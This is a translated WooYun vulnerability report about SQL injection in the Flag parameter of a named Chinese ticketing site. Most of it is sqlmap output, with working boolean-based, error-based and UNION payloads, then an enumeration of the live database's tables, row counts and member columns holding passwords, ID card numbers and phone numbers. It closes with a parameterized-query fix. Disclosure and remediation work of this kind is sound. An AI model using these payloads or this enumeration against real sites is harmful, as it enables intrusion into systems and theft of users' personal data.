Vulnerability summary (24 following)

Defect ID: wooyun-2015-0152363

Title: SQL injection on a site of 中国票务中心 (China Ticket Center) (200,000 user records plus a large volume of log records obtainable)

Vendor: 中国票务中心

Author: 路人甲

Submitted: 2015-12-07 11:27

Fix time: 2016-01-21 11:30

Disclosed: 2016-01-21 11:30

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed
2016-01-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Hopefully this isn't a duplicate submission!~~~ Took the chance to test this during a break after getting back; no idea how late tonight will run, so I'm submitting it first!~~~

Details:

First, the URL is

http://www.51piao.com/Flight/FlightSale.aspx?Flag=2


The Flag parameter is injectable

http://www.51piao.com/Flight/FlightSale.aspx?Flag=2'


The test returned the following result

“/”应用程序中的服务器错误。
字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Exception: 字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。


So there should be an injection here!~~~

[*] starting at 16:15:42
[16:15:42] [INFO] testing connection to the target URL
[16:15:44] [INFO] testing if the target URL is stable. This can take a couple of seconds
[16:15:45] [INFO] target URL is stable
[16:15:45] [INFO] testing if GET parameter 'Flag' is dynamic
[16:15:46] [INFO] confirming that GET parameter 'Flag' is dynamic
[16:15:47] [INFO] GET parameter 'Flag' is dynamic
[16:15:47] [WARNING] reflective value(s) found and filtering out
[16:15:47] [INFO] heuristic (basic) test shows that GET parameter 'Flag' might be injectable
[16:15:47] [INFO] testing for SQL injection on GET parameter 'Flag'
[16:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:15:52] [INFO] GET parameter 'Flag' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:15:59] [INFO] GET parameter 'Flag' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:15:59] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:16:05] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:16:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:16:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:16:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:16:29] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:33] [INFO] target URL appears to have 1 column in query
[16:16:33] [INFO] GET parameter 'Flag' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'Flag' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
Place: GET
Parameter: Flag
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Flag=2) AND 4749=4749 AND (2763=2763
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Flag=2) AND 7428=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7428=7428) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113))) AND (4091=4091
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: Flag=2) UNION ALL SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CHAR(113)+CHAR(67)+CHAR(114)+CHAR(98)+CHAR(81)+CHAR(79)+CHAR(100)+CHAR(84)+CHAR(89)+CHAR(65)+CHAR(83)+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113)--
---
[16:16:53] [INFO] testing Microsoft SQL Server
[16:16:53] [INFO] confirming Microsoft SQL Server
[16:16:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:37] [INFO] testing Microsoft SQL Server
[16:20:37] [INFO] confirming Microsoft SQL Server
[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:38] [INFO] fetching current user
current user: 'web61247'
[16:20:38] [INFO] fetching current database
current database: 'www_51piao_com'
[16:20:38] [INFO] testing if current user is DBA
current user is DBA: False
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com
Database: www_51piao_com
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.OrderLog | 960682 |
| dbo.TicketPrice | 370811 |
| dbo.vMemberAll | 341363 |
| dbo.vTicketPrice | 248395 |
| dbo.MemberAddrBook | 205929 |
| dbo.OrderMain | 179388 |
| dbo.OprLog | 178075 |
| dbo.vEmailAll | 130014 |
| dbo.MemberPointLog | 126487 |
| dbo.TicketOrderDetail | 124568 |
| dbo.TicketOrderDetail | 124568 |
| dbo.TicketOrderDetail | 124568 |
| dbo.vTicketOrderStat | 124568 |
| dbo.vFlightTicketOrder | 121543 |
| dbo.SmsLog | 110904 |
| dbo.vTicketOrder | 106021 |
| dbo.vMobileTemp | 98098 |
| dbo.vMoibleAll | 98098 |
| dbo.vMobileAllOrder | 98088 |
| dbo.vMemberTemp | 93105 |
| dbo.MemberMoneyLog | 81838 |
| dbo.TicketPlay | 81607 |
| dbo.VTicketPlayMag | 81561 |
| dbo.FlightLog | 72994 |
| dbo.TrainNew | 70195 |
| dbo.TrainNew | 70195 |
| dbo.vLoginLog | 58664 |
| dbo.ImagesTicket | 37727 |
| dbo.monitor | 36593 |
| dbo.FlightOrderDetail | 31300 |
| dbo.FlightOrderDetail | 31300 |
| dbo.vFlightOrderDetail | 21042 |
| dbo.vFlightOrderDetail | 21042 |
| dbo.vTicketDetail | 14126 |
| dbo.vTicketMag | 14126 |
| dbo.OrderPayCard | 13596 |
| dbo.vOrderPayCard | 13596 |
| dbo.MemberLog | 11974 |
| dbo.vFlightTicketSend | 10295 |
| dbo.AccountAll | 8329 |
| dbo.TicketPreOrder | 6293 |
| dbo.vTicketAddrUse | 5225 |
| dbo.vTicketAddrUse | 5225 |
| dbo.TicketReview | 3253 |
| dbo.FlightLogStat | 2756 |
| dbo.vTicketReviewList | 2647 |
| dbo.FlightKM | 1398 |
| dbo.o_kehu | 1317 |
| dbo.ImagesCommon | 860 |
| dbo.WebTop | 858 |
| dbo.JOYCOMPANY | 786 |
| dbo.VJoyCompanyMag | 786 |
| dbo.VJoyCompanyMag | 786 |
| dbo.LinkInfo | 780 |
| dbo.CITY | 647 |
| dbo.AgentInfo | 526 |
| dbo.VChinaCity | 455 |
| dbo.VNewsHelp1 | 416 |
| dbo.VNewsHelp1 | 416 |
| dbo.PointProductOrder | 293 |
| dbo.PointProductOrder | 293 |
| dbo.vTicketBig | 280 |
| dbo.vTicketHomeTop | 279 |
| dbo.MemberWebUnion | 210 |
| dbo.vTicketLeft | 176 |
| dbo.vTicketSmall | 155 |
| dbo.FlightCityCode | 152 |
| dbo.FlightSale | 144 |
| dbo.VFlightSale | 141 |
| dbo.Area | 131 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
| dbo.BlackIp | 103 |
| dbo.REGION | 96 |
| dbo.vTrainTrade | 65 |
| dbo.TrainTradeBak | 60 |
| dbo.TrainTradeBak | 60 |
| dbo.NewsHelpModule | 57 |
| dbo.NewsHelpModule | 57 |
| dbo.sysconstraints | 54 |
| dbo.vPointProduct1 | 44 |
| dbo.vPointProduct1 | 44 |
| dbo.VTravelLine1 | 35 |
| dbo.VTravelLine1 | 35 |
| dbo.vTravelLineDetail | 35 |
| dbo.Province | 34 |
| dbo.vMobileAllTrain | 26 |
| web61247.pangolin_test_table | 26 |
| dbo.vTicketTypeCount | 22 |
| dbo.vTicketTypeCount | 22 |
| dbo.TempSql | 17 |
| dbo.vJoyCompanyTop | 17 |
| dbo.TicketType | 14 |
| dbo.OrderPayMethod | 12 |
| dbo.FlightSpec | 11 |
| dbo.vFlightSpec | 11 |
| web61247.D99_Tmp | 11 |
| dbo.MemberGroup | 10 |
| dbo.SmsTemplate | 10 |
| dbo.vSmsTemplate | 10 |
| dbo.vTemp | 10 |
| dbo.BaseCreditCard | 9 |
| dbo.WebModule | 9 |
| dbo.vWebCity | 8 |
| dbo.WebCity | 8 |
| dbo.BlackList | 7 |
| dbo.SmsEvent | 7 |
| dbo.BbsBanner | 6 |
| dbo.Groups | 6 |
| dbo.OrderFlightTakeAddr | 6 |
| dbo.PointProductType | 5 |
| dbo.vHomeTicket | 5 |
| dbo.vSmsModule | 5 |
| dbo.vHotelOrder | 4 |
| dbo.syssegments | 3 |
| dbo.BaseYesNo | 2 |
| dbo.FlightTicketAddr | 2 |
| dbo.PriceType | 2 |
| dbo.CompanySeq | 1 |
| dbo.FlightSaleTop | 1 |
| dbo.OrderSeq | 1 |
| dbo.TravelCompany | 1 |
+------------------------------+---------+
Not sure why the member table was missing when I pulled the count for the whole database; luckily I had found members during my last test, so it looks like the user count has grown a bit!~~~
Database: www_51piao_com
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.Member | 198778 |
| dbo.vMember | 198778 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
+--------------+---------+
Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column |
+---------------+
| Account |
| ID |
| IsDisabled |
| LastLoginTime |
| LEVELID |
| LoginCount |
| Password |
| PurView |
| UserName |
+---------------+
Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column |
+---------------+
| Account |
| DepartName |
| ID |
| IsDisabled |
| LastLoginTime |
| LEVELID |
| LoginCount |
| Password |
| PurView |
| UserName |
+---------------+
Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column |
+---------------+
| Account |
| Address |
| Balance |
| BirthDay |
| CardNo |
| CardType |
| CityId |
| COMPANYADDR |
| CompanyId |
| CompanyName |
| COMPANYTEL |
| CompanyType |
| Degree |
| Email |
| FAX |
| GroupId |
| ID |
| ISAuditing |
| IsBindMobile |
| IsChinese |
| IsDesignWeb |
| IsDisabled |
| IsMailList |
| IsWeb |
| LastLoginTime |
| LoginCount |
| MemberType |
| MEMO |
| MOBILE |
| Name |
| NickName |
| openid |
| POINT |
| ProvinceId |
| Pwd |
| RegDate |
| SEX |
| STAFFID |
| STAFFNAME |
| TEL |
| VipMoney |
| VipNo |
| ZIPCODE |
+---------------+
Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column |
+---------------+
| Account |
| Address |
| Balance |
| BirthDay |
| CardNo |
| CardType |
| City |
| CityId |
| COMPANYADDR |
| CompanyId |
| CompanyName |
| COMPANYTEL |
| CompanyType |
| Degree |
| Email |
| FAX |
| GroupId |
| GroupName |
| ID |
| ISAuditing |
| IsBindMobile |
| IsChinese |
| IsDesignWeb |
| IsDisabled |
| IsMailList |
| IsWeb |
| LastLoginTime |
| LoginCount |
| MemberType |
| MEMO |
| MOBILE |
| Name |
| NickName |
| openid |
| POINT |
| ProvinceId |
| Pwd |
| RegDate |
| SEX |
| STAFFID |
| STAFFNAME |
| TEL |
| VipMoney |
| VipNo |
| ZIPCODE |
+---------------+


[Screenshots: 1.jpg, 2.jpg, 3.jpg, 4.jpg]


The data set is pretty large, so I stopped here!~~~~ Also, I'm short on time and have to rush out, so I didn't test any further; I'll test the rest tomorrow!~~~

Proof of vulnerability:

As above

Suggested fix:

Fix by filtering input
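Filtering alone is a weaker fix than binding the value as a typed parameter. The following is an added example, not the site's own code: it reconstructs the vulnerable pattern implied by the error message and the sqlmap payloads (an unquoted Flag value spliced inside parentheses ahead of ORDER BY [BeginTimeSort] ASC) next to an ADO.NET version that validates Flag as an integer and passes it as a parameter. The table name FlightSale, the column name Flag and the exact query shape are assumptions; only BeginTimeSort appears on the page.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public class FlightSaleQuery
{
    // Vulnerable pattern (assumed reconstruction, not the site's code): the raw query-string
    // value is concatenated into SQL, so Flag=2' produces "(Flag=2') ORDER BY ..." (the
    // unclosed-quote error shown in the report) and any other value is parsed as SQL too.
    public static string BuildUnsafeSql(string rawFlag)
    {
        return "SELECT * FROM FlightSale WHERE (Flag=" + rawFlag + ") ORDER BY [BeginTimeSort] ASC";
    }

    // Fixed version: reject anything that is not an integer at the boundary, then bind the
    // value as a typed parameter so SQL Server never interprets it as query text. Only APIs
    // present in .NET Framework 1.1 (the version the scan reported) are used.
    public static DataTable LoadFlightSales(string connectionString, string rawFlag)
    {
        int flag;
        try
        {
            flag = Int32.Parse(rawFlag);
        }
        catch (FormatException)
        {
            throw new ArgumentException("Flag must be an integer", "rawFlag");
        }
        catch (OverflowException)
        {
            throw new ArgumentException("Flag is out of range", "rawFlag");
        }

        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = conn.CreateCommand())
        {
            cmd.CommandText =
                "SELECT * FROM FlightSale WHERE (Flag=@Flag) ORDER BY [BeginTimeSort] ASC";
            cmd.Parameters.Add("@Flag", SqlDbType.Int).Value = flag;

            DataTable result = new DataTable();
            using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(result); // Fill opens and closes the connection itself
            }
            return result;
        }
    }
}
```

Pair this with customErrors mode="On" in web.config so the raw SQL Server error text shown in the test result above is no longer returned to clients, which removes the error-based channel sqlmap used to confirm the injection.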

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused